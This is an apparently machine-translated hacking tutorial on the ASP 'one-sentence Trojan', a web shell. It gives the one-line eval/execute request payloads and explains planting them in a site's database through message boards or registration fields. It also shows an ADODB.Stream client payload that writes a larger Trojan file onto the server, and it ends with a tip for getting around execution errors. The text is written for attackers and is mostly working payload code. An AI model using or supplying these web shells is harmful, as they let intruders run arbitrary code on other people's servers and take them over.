One-sentence Trojan

The hacker inserts the following information in the email address or personal homepage of the registration information:Code:

<% Execute request ("value") %>

<% Eval request ("value") %>)

When you know the URL of the database, you can use a local webpage to connect to the webshell. (You only need to know the ASP file to which the file <% eval request ("value") %> is inserted .)

This is called a sentence Trojan, which is based on the B/S structure.

 

First, find the website whose database is in ASP format, and then use the message board orArticleTo add a sentence to the ASP database.

Or add an ASP Webpage.

Remember! Our goal is to add a sentence <% execute request ("value") %> to the database, no matter how you do it!

Open the client (the HTM file on your computer), fill in the ASP file with a sentence, or ASP Webpage, and then kill it !, You can do what you want! (Author: Mosquito)

Principle of one-sentence Trojan

<SCRIPT runat = server Language = JavaScript> is the start mark of a Javascript script. The value of the runat attribute server indicates that the script will run on the server, the following Eval is the essence of a Trojan Horse. If the eval method is used, the strings in it will be executed. In this way, when the script runs on the server, the request is also executed. form ('#') + '', request. form ('#') is used to read the part where the name value in the HTML Tag attribute in the client file is named #. For example, the following code is taken from a single sentence client:

<Textarea name = # Cols = "80" rows = "10">

Set IP = server. Createobject ("ADODB. Stream ")

IP. Open

IP. type = 2

IP. charset = "gb2312"

IP. writetext request ("aoyun ")

IP. savetofile server. mappath ("aoyunwan. asp"), 2

IP. Close

Set IP = nothing

Response. Redirect "aoyunwan. asp"

</Textarea>

If you have learned HTML, you should note that the name attribute in the textarea tag is assigned as #, that is, the server side reads the code (using request. form ('#'), and then execute (use eval (request. form ('#') + ''), that is, the execution:

Set IP = server. Createobject ("ADODB. Stream ")

IP. Open

IP. type = 2

IP. charset = "gb2312"

IP. writetext request ("aoyun ")

IP. savetofile server. mappath ("aoyunwan. asp"), 2

IP. Close

Set IP = nothing

Response. Redirect "aoyunwan. asp"

If you have learned ASP, you should understand it. The code above indicates that you first create a stream object IP address, and then use the writetext method in the object to send the request ("aoyun ") the read content (that is, the content in the second textarea domain of the client, that is, our Trojan Code) is written to the server's aoyunwan. ASP

In the file, after the write is complete, use set IP = nothing to release the other party and then use response. Redirect "aoyunwan. asp" to switch to the written file, which is the last big horse we see!

About server errors

Often, when we add a sentence to an ASP file, the Type Mismatch Error will occur:

Script Error detected at line 1.

Source line:Execute request ("nettoo ")

Description:Type Mismatch: 'execute'

How can this problem be solved?

I have come up with a good solution. If I replace the "execute" server with "eval", there will be no errors!